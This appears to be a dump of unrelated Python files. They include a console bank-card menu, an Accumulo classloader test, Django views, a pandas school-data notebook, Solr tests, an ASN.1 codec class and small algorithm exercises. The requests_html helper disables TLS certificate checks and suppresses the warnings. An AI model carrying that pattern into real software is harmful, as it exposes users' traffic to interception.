    # NOTE(review): the `flag += 1` statements below rebind a local copy
    # only -- they never reach bank_login's counter; returning the updated
    # value would be needed for the attempt count to work as intended.
    if bankdict['ID'] == int(creditId):
        if bankdict['Pass'] == int(creditPass):
            LoginBankSucess(creditId)
        else:
            # if userId == 'quit':
            # print "系统即将退出!"
            # time.sleep(1)
            # main.welcome()
            # else:
            # flag += 1
            # print "你输入的密码有误,请重新输入!"
            flag += 1
            print "你输入的密码有误,请重新输入!"
    else:
        flag += 1
        print "你输入的信用卡号有误,请重新输入!"
def LoginBankSucess(creditId):
    # Credit-card service menu; tolerates up to 6 empty/out-of-range
    # selections (flag 0..5) before forcing an exit.
    flag = 0
    while flag <= 5:
        print '''
\t=========欢迎用户%s登录到信用卡中心=========
\t\t1.取现\t\t2.查询\t\t
\t\t3.还款\t\t4.转账\t\t
\t\t5.购物\t\t6.退出\t\t
''' % creditId
        choicebank = raw_input('''请选择指令:''').strip()
        if len(choicebank) == 0:
            flag += 1
            print "指令不能为空,请重新输入![1-6]"
        else:
            # NOTE(review): int() raises ValueError on non-numeric input;
            # there is no guard here.
            choicebank = int(choicebank)
            if choicebank >= 1 and choicebank <= 6:
                # Dispatch to the selected bankmanage operation.
                if choicebank == 1:
                    bankmanage.draw()
                if choicebank == 2:
                    bankmanage.check()
                if choicebank == 3:
                    bankmanage.repayment()
                if choicebank == 4:
                    bankmanage.transfer()
                if choicebank == 5:
                    bankmanage.shoppay()
                if choicebank == 6:
                    print '程序即将退出信用卡中心,欢迎下次使用!'
                    time.sleep(1)
                    main.welcome()
            else:
                flag += 1
                print "你输入的指令不在规定范围内,请重新输入![1-6]"
    print "你输入的错误次数已达5次!系统将退出!"
    time.sleep(1)

# Script entry point: start the login loop when the module runs.
bank_login()
from itertools import combinations
def solution(numbers):
    """Return the sorted distinct sums of every unordered pair in *numbers*."""
    pair_sums = {first + second for first, second in combinations(numbers, 2)}
    return sorted(pair_sums)
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import unittest
import time
import glob
from aggregation import AggregationTest
from TestUtils import ACCUMULO_HOME
log = logging.getLogger('test.auto')
class DynamicClassloader(AggregationTest):
    "Start a clean accumulo, use a newly created aggregator, verify the data is aggregated"
    # Relative ordering hint used by the test harness.
    order = 25

    def runWait(self, cmd):
        # Run a shell command on the master host and block until it exits.
        handle = self.runOn(self.masterHost(), ['bash', '-c', cmd]);
        self.wait(handle)

    def runTest(self):
        import string, random
        # Random 4-hex-digit suffix so the generated class/jar names are
        # unique per test run.
        rand = list(string.hexdigits)
        random.shuffle(rand)
        rand = ''.join(rand[0:4])
        # Make sure paths exists for test
        if not os.path.exists(os.path.join(ACCUMULO_HOME, 'target','dynamictest%s' % rand, 'accumulo','test')):
            os.makedirs(os.path.join(ACCUMULO_HOME, 'target', 'dynamictest%s' % rand, 'accumulo', 'test'))
        # Emit a fresh SummingCombiner Java source with the random suffix.
        fp = open(os.path.join(ACCUMULO_HOME, 'target', 'dynamictest%s' % rand, 'accumulo', 'test', 'SummingCombiner%s.java' % rand), 'wb')
        fp.write('''
package accumulo.test;
import java.util.Iterator;
import org.apache.accumulo.core.data.Key;
import org.apache.accumulo.core.iterators.LongCombiner;
public class SummingCombiner%s extends LongCombiner {
@Override
public Long typedReduce(Key key, Iterator<Long> iter) {
long sum = 0;
while (iter.hasNext()) {
sum = safeAdd(sum, iter.next());
}
return sum;
}
@Override
public IteratorOptions describeOptions() {
IteratorOptions io = super.describeOptions();
io.setName("sum");
io.setDescription("SummingCombiner interprets Values as Longs and adds them together. A variety of encodings (variable length, fixed length, or string) are available");
return io;
}
}
''' % rand)
        fp.close()
        # Build the compile classpath from `accumulo classpath` output
        # (only file: entries are usable by javac).
        handle = self.runOn(self.masterHost(), [self.accumulo_sh(), 'classpath'])
        out, err = handle.communicate()
        parts = []
        for line in out.split('\n'):
            line = line.strip()
            if line.startswith("file:"):
                parts.append(line[5:])
        path = ':'.join(parts)
        # Compile the combiner and package it into lib/ext so Accumulo's
        # dynamic classloader can pick it up without a restart.
        self.runWait("javac -cp %s:%s %s" % (
            path,
            os.path.join(ACCUMULO_HOME,'src','core','target','classes'),
            os.path.join(ACCUMULO_HOME,'target','dynamictest%s' % rand,'accumulo','test','SummingCombiner%s.java' % rand)
        ))
        self.runWait("jar -cf %s -C %s accumulo/" % (
            os.path.join(ACCUMULO_HOME,'lib','ext','Aggregator%s.jar' % rand),
            os.path.join(ACCUMULO_HOME,'target','dynamictest%s' % rand)
        ))
        self.sleep(1)
        # initialize the database
        combiner = 'accumulo.test.SummingCombiner%s' % rand
        cmd = 'createtable --no-default-iterators test\nsetiter -t test -p 10 -scan -minc -majc -n testcombineriter -class '+ combiner+'\n\ncf\n\nSTRING'
        out, err, code = self.rootShell(self.masterHost(),"%s\n" % cmd)
        self.assert_(code == 0)
        # insert some rows
        log.info("Starting Test Ingester")
        cmd = ''
        for i in range(10):
            cmd += 'table test\ninsert row1 cf col1 %d\n' % i
        out, err, code = self.rootShell(self.masterHost(), cmd)
        self.assert_(code == 0)
        # Verify aggregation, then verify again after a restart to prove the
        # dynamically loaded class survives a shutdown/startup cycle.
        self.checkSum()
        self.shutdown_accumulo()
        self.start_accumulo()
        self.checkSum()
        os.remove(os.path.join(ACCUMULO_HOME, 'lib','ext','Aggregator%s.jar' % rand))
def suite():
    """Assemble the unittest suite for this module."""
    tests = unittest.TestSuite()
    tests.addTest(DynamicClassloader())
    return tests
|
from django.contrib import admin
from .models import *
# Register your models here.
# Expose each model to Django's auto-generated admin CRUD interface with
# the default ModelAdmin options.
admin.site.register(Machine)
admin.site.register(Maker)
admin.site.register(Raw)
admin.site.register(Model)
# 상근이는 매일 아침 알람을 듣고 일어난다.
# 알람을 듣고 바로 일어나면 다행이겠지만,
# 항상 조금만 더 자려는 마음 때문에 매일 학교를 지각하고 있다.
# 상근이는 모든 방법을 동원해보았지만,
# 조금만 더 자려는 마음은 그 어떤 것도 없앨 수가 없었다.
# 이런 상근이를 불쌍하게 보던 창영이는 자신이 사용하는 방법을 추천해 주었다.
# 바로 "45분 일찍 알람 설정하기"이다.
# 이 방법은 단순하다.
# 원래 설정되어 있는 알람을 45분 앞서는 시간으로 바꾸는 것이다.
# 어차피 알람 소리를 들으면, 알람을 끄고 조금 더 잘 것이기 때문이다.
# 이 방법을 사용하면 매일 아침 더 잤다는 기분을 느낄 수 있고,
# 학교도 지각하지 않게 된다.
# 현재 상근이가 설정한 알람 시각이 주어졌을 때 창영이의 방법을 사용한다면,
# 이를 언제로 고쳐야 하는지 구하는 프로그램을 작성하시오.
# 현재 상근이의 알람 시간 H시 M분 입력
# Read the currently configured alarm time: H hours, M minutes.
H, M = map(int, input().split())
# Move the alarm 45 minutes earlier; borrow an hour when the minutes go
# negative, and wrap past midnight when the hours do.
M = M - 45
if M < 0:
    M += 60
    H -= 1
    if H < 0:
        H += 24
print("%d %d"%(H,M))
|
# Emit the three greeting lines in their original order.
for greeting in ('hola', 'Hola Universo... ¿cómo estás?', 'Hola Universo hehe'):
    print(greeting)
|
# coding: utf-8
# # PyCity Schools Analysis
#
# * As a whole, schools with higher budgets, did not yield better test results. By contrast, schools with higher spending per student actually (\$645-675) underperformed compared to schools with smaller budgets (<\$585 per student).
#
# * As a whole, smaller and medium sized schools dramatically out-performed large sized schools on passing math performances (89-91% passing vs 67%).
#
# * As a whole, charter schools out-performed the public district schools across all metrics. However, more analysis will be required to glean if the effect is due to school practices or the fact that charter schools tend to serve smaller student populations per school.
# ---
# ### Note
# * Instructions have been included for each segment. You do not have to follow them exactly, but they are included to help you think through the steps.
# In[177]:
# Dependencies and Setup
import pandas as pd
import numpy as np

# File to Load (Remember to Change These)
school_data_to_load = "Resources/schools_complete.csv"
student_data_to_load = "Resources/students_complete.csv"

# Read School and Student Data File and store into Pandas Data Frames
school_data = pd.read_csv(school_data_to_load)
student_data = pd.read_csv(student_data_to_load)

# Combine the data into a single dataset
# Left-join every student row onto its school's row; the duplicated key in
# `on` is redundant (both entries name the same column) but harmless.
school_data_complete = pd.merge(student_data, school_data, how="left", on=["school_name", "school_name"])
# ## District Summary
#
# * Calculate the total number of schools
#
# * Calculate the total number of students
#
# * Calculate the total budget
#
# * Calculate the average math score
#
# * Calculate the average reading score
#
# * Calculate the overall passing rate (overall average score), i.e. (avg. math score + avg. reading score)/2
#
# * Calculate the percentage of students with a passing math score (70 or greater)
#
# * Calculate the percentage of students with a passing reading score (70 or greater)
#
# * Create a dataframe to hold the above results
#
# * Optional: give the displayed data cleaner formatting
# In[178]:
total_schools = school_data_complete['school_name'].nunique() # Produces *TOTAL NUMBER OF SCHOOLS*
total_students = school_data_complete['Student ID'].nunique() # Produces *TOTAL NUMBER OF STUDENTS*
df_school_budgets = school_data_complete['budget'].unique() # Stores all individual school budgets as array
total_budget = df_school_budgets.sum() # Sums individual school budgets // still need to format as $$
avg_math_score_dist = school_data_complete['math_score'].mean() # district-wide average math score
avg_read_score_dist = school_data_complete['reading_score'].mean() # district-wide average reading score
# A score of 70 or above counts as passing (filter keeps scores > 69).
math_pass = school_data_complete.loc[school_data_complete['math_score'] > 69]
read_pass = school_data_complete.loc[school_data_complete['reading_score'] > 69]
percent_pass_math = (len(math_pass) / total_students) * 100
percent_pass_read = (len(read_pass) / total_students) * 100
# Overall rate = simple mean of the two average scores (not of pass rates).
overall_passing_Rate = (avg_math_score_dist + avg_read_score_dist)/2
# Debug prints retained from notebook development:
#print(total_schools)
#print(total_students)
#print(total_budget)
#print(avg_math_score_dist)
#print(avg_read_score_dist)
#print(percent_pass_math)
#print(percent_pass_read)
#print(overall_passing_Rate)
#school_data_complete.head() # Test Run to see what the data frame looks like
# In[179]:
# One-row summary frame for the district, with currency/thousands display
# formatting applied to the budget and student-count columns.
district_data = pd.DataFrame({'Total Schools': [total_schools],
'Total Students': [total_students],
'Total Budget': [total_budget],
'Average Math Score': [avg_math_score_dist],
'Average Reading Score': [avg_read_score_dist],
'% Passing Math': [percent_pass_math],
'% Passing Reading': [percent_pass_read],
'% Overall Passing Rate': [overall_passing_Rate],
})
district_data['Total Budget'] = district_data['Total Budget'].map("${:,.2f}".format)
district_data['Total Students'] = district_data['Total Students'].apply('{:,}'.format)
district_data
# ## School Summary
# * Create an overview table that summarizes key metrics about each school, including:
# * School Name
# * School Type
# * Total Students
# * Total School Budget
# * Per Student Budget
# * Average Math Score
# * Average Reading Score
# * % Passing Math
# * % Passing Reading
# * Overall Passing Rate (Average of the above two)
#
# * Create a dataframe to hold the above results
# ## Top Performing Schools (By Passing Rate)
# * Sort and display the top five schools in overall passing rate
# In[180]:
# --- Build one small frame per metric, all keyed by school_name, then merge ---
school_group = school_data_complete.groupby('school_name')
print(school_group)
# In[181]:
# School type lookup (one row per school).
school_type = school_data_complete[['school_name', 'type']]
school_type = school_type.drop_duplicates()
school_type = school_type.reset_index()
school_type = school_type.drop(columns=['index'])
school_type
# In[182]:
# Enrolment per school (count of Student IDs).
student_total = pd.DataFrame(school_group['Student ID'].count())
student_total = student_total.reset_index()
student_total
# In[183]:
# Budget per school (budget repeats on every student row, so dedupe).
school_budget = school_data_complete[['school_name', 'budget']]
school_budget = school_budget.drop_duplicates()
school_budget = school_budget.reset_index()
school_budget = school_budget.drop(columns=['index'])
school_budget
# In[184]:
# Average math score per school.
by_school_data_math = school_data_complete.groupby(['school_name'])
avg_math_score_school = by_school_data_math['math_score'].mean()
avg_math_score_school = pd.DataFrame([avg_math_score_school])
avg_math_score_school = avg_math_score_school.transpose()
avg_math_score_school = avg_math_score_school.rename(columns = {'math_score':'Average Math Score'})
avg_math_score_school = avg_math_score_school.reset_index()
avg_math_score_school
# In[185]:
# Average reading score per school.
by_school_data_read = school_data_complete.groupby(['school_name'])
avg_read_score_school = by_school_data_read['reading_score'].mean()
avg_read_score_school = pd.DataFrame([avg_read_score_school])
avg_read_score_school = avg_read_score_school.transpose()
avg_read_score_school = avg_read_score_school.rename(columns = {'reading_score':'Average Reading Score'})
avg_read_score_school = avg_read_score_school.reset_index()
avg_read_score_school
# In[186]:
# Count of students passing math (>= 70) per school; value_counts puts the
# school names in the index, hence the reset/rename dance below.
math_pass = school_data_complete.loc[school_data_complete['math_score'] > 69]
math_pass_byschool = math_pass['school_name'].value_counts()
math_pass_byschool = pd.DataFrame(math_pass_byschool)
math_pass_byschool = math_pass_byschool.rename(columns = {'school_name':'Pass Math'})
math_pass_byschool = math_pass_byschool.reset_index()
math_pass_byschool = math_pass_byschool.rename(columns = {'index':'school_name'})
math_pass_byschool
# In[187]:
# Same for reading.
read_pass = school_data_complete.loc[school_data_complete['reading_score'] > 69]
read_pass
read_pass_byschool = read_pass['school_name'].value_counts()
read_pass_byschool = pd.DataFrame(read_pass_byschool)
read_pass_byschool = read_pass_byschool.rename(columns = {'school_name':'Pass Reading'})
read_pass_byschool = read_pass_byschool.reset_index()
read_pass_byschool = read_pass_byschool.rename(columns = {'index':'school_name'})
read_pass_byschool
# In[188]:
# Merge every per-metric frame into one per-school summary table.
school_data_mergeseries = pd.merge(school_type, student_total, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, school_budget, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, avg_math_score_school, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, avg_read_score_school, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, math_pass_byschool, on=["school_name"])
school_data_summaryfile = pd.merge(school_data_mergeseries, read_pass_byschool, on=["school_name"])
school_data_summaryfile
# In[189]:
# Derived per-school metrics: per-student spend and passing percentages.
school_data_summaryfile['Per Student Budget'] = (school_data_summaryfile['budget'] / school_data_summaryfile['Student ID'])
school_data_summaryfile['% Passing Math'] = (school_data_summaryfile['Pass Math'] / school_data_summaryfile['Student ID']) * 100
school_data_summaryfile['% Passing Reading'] = (school_data_summaryfile['Pass Reading'] / school_data_summaryfile['Student ID']) * 100
school_data_semi_clean = school_data_summaryfile.drop(columns=['Pass Math', 'Pass Reading'])
# Here the overall rate is the mean of the two passing percentages.
school_data_semi_clean['% Overall Passing Rate'] = (school_data_semi_clean['% Passing Reading'] + school_data_semi_clean['% Passing Math']) / 2
school_data_semi_clean
# In[190]:
school_data_col_rename = school_data_semi_clean.rename(columns = {'type':'School Type', 'Student ID':'Total Students', 'budget':'Total School Budget'})
school_data_col_rename
# In[191]:
# Reorder columns and index by school name for display.
school_data_semi_arranged = school_data_col_rename[['school_name','School Type','Total Students','Total School Budget', 'Per Student Budget', 'Average Math Score', 'Average Reading Score', '% Passing Math', '% Passing Reading', '% Overall Passing Rate']]
school_data_semi_final = school_data_semi_arranged.set_index(['school_name'])
school_data_semi_final
# In[192]:
# Top five schools by overall passing rate.
school_data_finalreport = school_data_semi_final.sort_values('% Overall Passing Rate',ascending=False)
school_data_finalreport.head()
# ## Bottom Performing Schools (By Passing Rate)
# * Sort and display the five worst-performing schools
# In[193]:
# Bottom five: re-sort ascending (note this rebinds school_data_finalreport).
school_data_finalreport = school_data_finalreport.sort_values('% Overall Passing Rate',ascending=True)
school_data_finalreport.head()
# ## Math Scores by Grade
# * Create a table that lists the average Math Score for students of each grade level (9th, 10th, 11th, 12th) at each school.
#
# * Create a pandas series for each grade. Hint: use a conditional statement.
#
# * Group each series by school
#
# * Combine the series into a dataframe
#
# * Optional: give the displayed data cleaner formatting
# In[194]:
school_data_complete.head()
# In[195]:
# Average math score per school for each grade: filter by grade, keep the
# key/score columns, then take the per-school mean.
ninth_grade = school_data_complete.loc[school_data_complete['grade'] == '9th']
ninth_grade = ninth_grade[['school_name','grade','math_score']]
ninth_grade_math_avg = ninth_grade.groupby(['school_name']).mean()
# In[196]:
tenth_grade = school_data_complete.loc[school_data_complete['grade'] == '10th']
tenth_grade = tenth_grade[['school_name','grade','math_score']]
tenth_grade_math_avg = tenth_grade.groupby(['school_name']).mean()
# In[197]:
eleventh_grade = school_data_complete.loc[school_data_complete['grade'] == '11th']
eleventh_grade = eleventh_grade[['school_name','grade','math_score']]
eleventh_grade_math_avg = eleventh_grade.groupby(['school_name']).mean()
# In[198]:
twelveth_grade = school_data_complete.loc[school_data_complete['grade'] == '12th']
twelveth_grade = twelveth_grade[['school_name','grade','math_score']]
twelveth_grade_math_avg = twelveth_grade.groupby(['school_name']).mean()
# In[199]:
# Merge the four per-grade frames.  Each merge of identically-named columns
# produces math_score_x / math_score_y suffixes, which are renamed to the
# grade labels right after each colliding merge.
school_math_by_grade = pd.merge(ninth_grade_math_avg, tenth_grade_math_avg, on=["school_name"])
school_math_by_grade = school_math_by_grade.rename(columns={'math_score_x':'9th','math_score_y':'10th'} )
school_math_by_grade = pd.merge(school_math_by_grade, eleventh_grade_math_avg, on=["school_name"])
school_math_by_grade = pd.merge(school_math_by_grade, twelveth_grade_math_avg, on=["school_name"])
school_math_by_grade = school_math_by_grade.rename(columns={'math_score_x':'11th','math_score_y':'12th'} )
school_math_by_grade
# ## Reading Score by Grade
# * Perform the same operations as above for reading scores
# In[200]:
# Same per-grade breakdown as the math section, for reading scores.
ninth_grade = school_data_complete.loc[school_data_complete['grade'] == '9th']
ninth_grade = ninth_grade[['school_name','grade','reading_score']]
ninth_grade_read_avg = ninth_grade.groupby(['school_name']).mean()
# In[201]:
tenth_grade = school_data_complete.loc[school_data_complete['grade'] == '10th']
tenth_grade = tenth_grade[['school_name','grade','reading_score']]
tenth_grade_read_avg = tenth_grade.groupby(['school_name']).mean()
# In[202]:
eleventh_grade = school_data_complete.loc[school_data_complete['grade'] == '11th']
eleventh_grade = eleventh_grade[['school_name','grade','reading_score']]
eleventh_grade_read_avg = eleventh_grade.groupby(['school_name']).mean()
# In[203]:
twelveth_grade = school_data_complete.loc[school_data_complete['grade'] == '12th']
twelveth_grade = twelveth_grade[['school_name','grade','reading_score']]
twelveth_grade_read_avg = twelveth_grade.groupby(['school_name']).mean()
# In[214]:
# Merge and rename suffixed columns to grade labels (see math section).
school_reading_by_grade = pd.merge(ninth_grade_read_avg, tenth_grade_read_avg, on=["school_name"])
school_reading_by_grade = school_reading_by_grade.rename(columns={'reading_score_x':'9th','reading_score_y':'10th'} )
school_reading_by_grade = pd.merge(school_reading_by_grade, eleventh_grade_read_avg, on=["school_name"])
school_reading_by_grade = pd.merge(school_reading_by_grade, twelveth_grade_read_avg, on=["school_name"])
school_reading_by_grade = school_reading_by_grade.rename(columns={'reading_score_x':'11th','reading_score_y':'12th'} )
school_reading_by_grade
# ## Scores by School Spending
# * Create a table that breaks down school performances based on average Spending Ranges (Per Student). Use 4 reasonable bins to group school spending. Include in the table each of the following:
# * Average Math Score
# * Average Reading Score
# * % Passing Math
# * % Passing Reading
# * Overall Passing Rate (Average of the above two)
# In[218]:
# Bin schools by per-student spending and average the score metrics per bin.
bins = [0, 585, 620, 650, 675]
# BUG FIX: the last label previously read "$645-660", which did not match
# its bin edges (650-675).
group_names = ["<$585", "$585-620", "$620-650", "$650-675"]
# In[219]:
school_data_finalreport.head()
# In[220]:
school_data_finalreport['Spending Ranges (Per Student)'] = pd.cut(school_data_finalreport["Per Student Budget"], bins, labels=group_names)
school_data_studentcostbin = school_data_finalreport.drop(columns=['Total Students','Total School Budget','Per Student Budget'])
school_data_studentcostbin.groupby(['Spending Ranges (Per Student)']).mean()
# ## Scores by School Size
# * Perform the same operations as above, based on school size.
# In[234]:
# Sample bins. Feel free to create your own bins.
size_bins = [0, 1000, 3000, 5000]
group_names = ["Tall <1000", "Grande 1000-3000", "Venti 3000-5000"]
# In[235]:
# Bucket schools by enrolment and average the score metrics per bucket.
school_data_finalreport['School Size'] = pd.cut(school_data_finalreport['Total Students'], size_bins, labels=group_names)
school_data_studentsizebin = school_data_finalreport.drop(columns=['Total Students','Total School Budget','Per Student Budget'])
school_data_studentsizebin.groupby(['School Size']).mean()
# ## Scores by School Type
# * Perform the same operations as above, based on school type.
# In[236]:
# Average the score metrics per school type.
school_data_typereport = school_data_finalreport.drop(columns=['Total Students','Total School Budget','Per Student Budget'])
school_data_typereport.groupby(['School Type']).mean()
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import configparser
import logging
import pkg_resources
import time
from nexustiles.dao.SolrProxy import SolrProxy
from shapely.geometry import box
class TestQuery(unittest.TestCase):
    """Integration smoke tests for SolrProxy against a live Solr backend.

    Most tests only print result sizes/contents rather than asserting on
    them; they require the datastore described in config/datastores.ini to
    be reachable.
    """
    def setUp(self):
        """Load Solr connection settings and build the proxy under test."""
        config = configparser.RawConfigParser()
        # NOTE(review): readfp() is deprecated (removed in Python 3.12);
        # migrate to read_file() with a text stream.
        config.readfp(pkg_resources.resource_stream(__name__, "config/datastores.ini"), filename='datastores.ini')
        self.proxy = SolrProxy(config)
        logging.basicConfig(level=logging.DEBUG)
    def test_find_distinct_section_specs_in_polygon(self):
        # Distinct bounding boxes for one dataset over the whole globe,
        # from epoch second 1 until now.
        result = self.proxy.find_distinct_bounding_boxes_in_polygon(box(-180, -90, 180, 90),
                                                                    "MXLDEPTH_ECCO_version4_release1",
                                                                    1, time.time())
        print(len(result))
        for r in sorted(result):
            print(r)
    def test_find_all_tiles_in_polygon_with_spec(self):
        # fq narrows the query to a single sectionSpec.
        result = self.proxy.find_all_tiles_in_polygon(box(-180, -90, 180, 90),
                                                      "AVHRR_OI_L4_GHRSST_NCEI",
                                                      fq={'sectionSpec_s:\"time:0:1,lat:100:120,lon:0:40\"'},
                                                      rows=1, limit=1)
        print(result)
    def test_find_tiles_by_id(self):
        result = self.proxy.find_tiles_by_id(['0cc95db3-293b-3553-b7a3-42920c3ffe4d'], ds="AVHRR_OI_L4_GHRSST_NCEI")
        self.assertIsInstance(result, list)
        # NOTE(review): assertIs compares identity; this passes only thanks
        # to CPython small-int caching — prefer assertEqual for counts.
        self.assertIs(len(result), 1)
        print(result)
    def test_find_max_date_from_tiles(self):
        result = self.proxy.find_max_date_from_tiles(["a764f12b-ceac-38d6-9d1d-89a6b68db32b"],
                                                     "JPL-L4_GHRSST-SSTfnd-MUR-GLOB-v02.0-fv04.1", rows=1, limit=1)
        print(result)
    def test_find_tiles_by_exact_bounds(self):
        result = self.proxy.find_tiles_by_exact_bounds(175.01, -42.68, 180.0, -40.2,
                                                       "JPL-L4_GHRSST-SSTfnd-MUR-GLOB-v02.0-fv04.1", rows=5000)
        print(len(result))
    def test_get_data_series_list(self):
        result = self.proxy.get_data_series_list()
        print(len(result))
    def test_find_all_tiles_by_metadata(self):
        # Metadata filter is a raw Solr field:value clause.
        result = self.proxy.find_all_tiles_by_metadata(['granule_s:19811114120000-NCEI-L4_GHRSST-SSTblend-AVHRR_OI-GLOB-v02.0-fv02.0.nc'], ds="AVHRR_OI_L4_GHRSST_NCEI")
        print(len(result))
    def test_get_tile_count(self):
        tile_count = self.proxy.get_tile_count("AVHRR_OI_L4_GHRSST_NCEI", bounding_polygon=box(-180, -90, 180, 90),
                                               start_time=1, end_time=time.time(),
                                               metadata=['granule_s:19811114120000-NCEI-L4_GHRSST-SSTblend-AVHRR_OI-GLOB-v02.0-fv02.0.nc'])
        print(tile_count)
    def test_get_data_series_stats(self):
        print((self.proxy.get_data_series_stats('AVHRR_OI_L4_GHRSST_NCEI')))
    def test_find_days_in_range_asc(self):
        print((self.proxy.find_days_in_range_asc(-90, 90, -180, 180, 'AVHRR_OI_L4_GHRSST_NCEI', 1, time.time())))
|
# coding: utf-8
from requests_html import AsyncHTMLSession, HTMLSession, requests
def retry_session(retries=5, session=None):
    """Return *session* (or a fresh HTMLSession) with retrying HTTP adapters.

    BUG FIX: the default used to be ``session=HTMLSession()`` — a mutable
    default evaluated once at import time, so every caller relying on the
    default shared (and re-mounted adapters onto) the same session object.

    Args:
        retries: total/read/connect retry budget for the adapter.
        session: an existing requests-html session to configure; a fresh
            HTMLSession is created when omitted.
    """
    if session is None:
        session = HTMLSession()
    retry = requests.urllib3.util.retry.Retry(
        total=retries,
        read=retries,
        connect=retries,
        status_forcelist=(500, 502, 503, 504),
    )
    adapter = requests.adapters.HTTPAdapter(max_retries=retry)
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    # Globally silence TLS-verification warnings (side effect kept from the
    # original implementation).
    requests.urllib3.disable_warnings()
    return session
def get_asession():
    """Build a new AsyncHTMLSession pre-configured with retrying adapters."""
    async_session = AsyncHTMLSession()
    return retry_session(session=async_session)
def asession_get(url, params=None):
    """Issue an async GET with a fixed PlayBook user-agent, a 3 s timeout
    and TLS verification disabled."""
    ua = 'Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+'
    session = get_asession()
    return session.get(url=url, params=params, timeout=3, verify=False, headers={'user-agent': ua})
|
from django.shortcuts import render, redirect
from apps.ninja_gold.models import Wallet, Form
# Create your views here.
def index(request):
    """Render the ninja-gold dashboard with the wallet total and activity log."""
    wallet = Wallet(request)
    return render(request, 'ninja/index.html', {
        'total': wallet.total_gold,
        'activites': wallet.activites,
    })
def find_gold(request):
    """Handle a gold-finding action and return to the dashboard.

    On a valid POST, update the session wallet for the chosen activity.
    BUG FIX: the view previously returned the redirect only inside the
    nested ifs, so a GET request or an invalid form returned None, which
    makes Django raise "didn't return an HttpResponse".  It now always
    redirects.
    """
    if request.method == 'POST':
        wallet = Wallet(request)
        form = Form(request.POST)
        if form.is_valid():
            wallet.find_gold(form.cleaned_data['ninja'])
    return redirect('/')
|
from pyasn1.type.univ import SequenceOf, noValue
from asn1PERser.codec.per.encoder import encode_sequence_of
from asn1PERser.codec.per.decoder import decode_sequence_of
from asn1PERser.classes.types.constraint import SequenceOfValueSize, MAX
class SequenceOfType(SequenceOf):
    """PER-serialisable SEQUENCE OF base type.

    Extends pyasn1's SequenceOf with the hooks asn1PERser's field-list
    based PER encoder/decoder expects.
    """
    # Unconstrained size (0..MAX) by default; concrete protocol types
    # override this with their own constraint.
    subtypeSpec = SequenceOfValueSize(0, MAX)
    def fill_field_list(self, field_list):
        """Append this value's PER-encoded fields to *field_list* (encoder hook)."""
        sequence_of_field_list = encode_sequence_of(self)
        if sequence_of_field_list:
            field_list.extend(sequence_of_field_list)
    def create_field_list(self, per_bytes):
        """Decode *per_bytes* into this SEQUENCE OF (decoder hook)."""
        decoded = decode_sequence_of(self, per_bytes)
        return decoded
    def to_dict(self, is_root=True):
        """Convert the sequence to a plain list of component dicts.

        Components with no value and no nested componentType are skipped.
        The root call always returns a list (possibly empty); nested calls
        collapse an empty result to noValue so the parent can omit the field.
        """
        component_list = []
        for componentValue in self:
            if (componentValue is not noValue and componentValue.isValue) or hasattr(componentValue, 'componentType'):
                value_dict = componentValue.to_dict(is_root=False)
                if value_dict is not noValue:
                    component_list.append(value_dict)
        if is_root:
            return component_list
        if not component_list:
            return noValue
        return component_list
|
def f(string):
    """Return ``(unit, count)`` where *string* equals ``unit`` repeated
    ``count`` times, using the shortest such unit.

    Any non-empty string is at worst itself repeated once, so a result is
    always found; an empty string returns None (no candidate lengths).

    BUG FIX: ported from Python 2 — ``xrange`` does not exist on Python 3,
    and ``length / a`` is float division there, making ``current * number``
    raise TypeError.  Now uses ``range`` and floor division.
    """
    length = len(string)
    for a in range(1, length + 1):
        current = string[:a]
        number = length // a
        if current * number == string:
            return current, number
|
"""
Time complexity: O(N)
Space complexity: O(1)
Compiled on leetcode: Yes
Difficulties faced: None
"""
class Solution:
    def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
        """Return the first node common to both singly linked lists, or None
        when the lists do not intersect.

        Strategy: measure both lengths, advance the head of the longer list
        by the difference, then walk both lists in lockstep until the
        cursors meet.
        """
        def _length(node):
            # Count nodes from *node* to the tail.
            total = 0
            while node is not None:
                total += 1
                node = node.next
            return total

        size_a = _length(headA)
        size_b = _length(headB)
        # Align both cursors at the same distance from the tail.
        if size_a > size_b:
            for _ in range(size_a - size_b):
                headA = headA.next
        else:
            for _ in range(size_b - size_a):
                headB = headB.next
        while headA is not None and headB is not None:
            if headA == headB:
                return headA
            headA = headA.next
            headB = headB.next
        return None
import json
from datetime import date, timedelta
from django.views.generic import TemplateView
from djofx import models
from djofx.utils import qs_to_monthly_report
from djofx.views.base import PageTitleMixin, UserRequiredMixin
class MonthlyTransactionsView(PageTitleMixin, UserRequiredMixin, TemplateView):
    """Render a month-by-month breakdown of the logged-in user's
    transactions, as JSON-encoded outgoings and income series."""
    template_name = 'djofx/monthly.html'
    page_title = 'Monthly Breakdown'
    def get_report_by_type(self, type):
        """Return a JSON string of the monthly report for one category type.

        ``type`` (note: shadows the builtin; name kept for interface
        stability) is a TransactionCategory type constant.  Only the
        current user's transactions from roughly the last six months are
        included — the cutoff is clamped to the 1st of its month so whole
        months are reported.
        """
        cutoff = date.today() - timedelta(days=180)
